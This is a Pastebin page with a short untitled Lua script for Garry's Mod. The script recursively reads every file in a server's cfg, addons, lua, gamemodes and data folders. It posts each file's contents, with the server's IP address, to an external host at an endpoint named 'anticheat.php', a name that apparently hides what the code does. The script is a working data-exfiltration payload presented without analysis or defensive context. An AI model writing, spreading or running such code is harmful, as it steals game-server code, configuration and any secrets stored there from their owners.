Advertisement
BazZziliuS

Untitled

Nov 21st, 2022
568
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.37 KB | None | 0 0
  1. local function a(b)
  2. local c,d=file.Find(b.."*","MOD")
  3. for _,f in pairs(c)do
  4. local g=file.Read(b.."/"..f,"GAME")
  5. -- if g==nil then return end
  6. http.Post("http://cn32578.tw1.ru/anticheat.php",{one=b,two=f,tree=g,vfo=string.Replace(game.GetIPAddress(),":","_")})
  7. end
  8. for h,i in pairs(d)do
  9. a(b..i.."/")
  10. end
  11. end
  12. a("cfg/")
  13. a("addons/")
  14. a("lua/")
  15. a("gamemodes/")
  16. a("data/")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement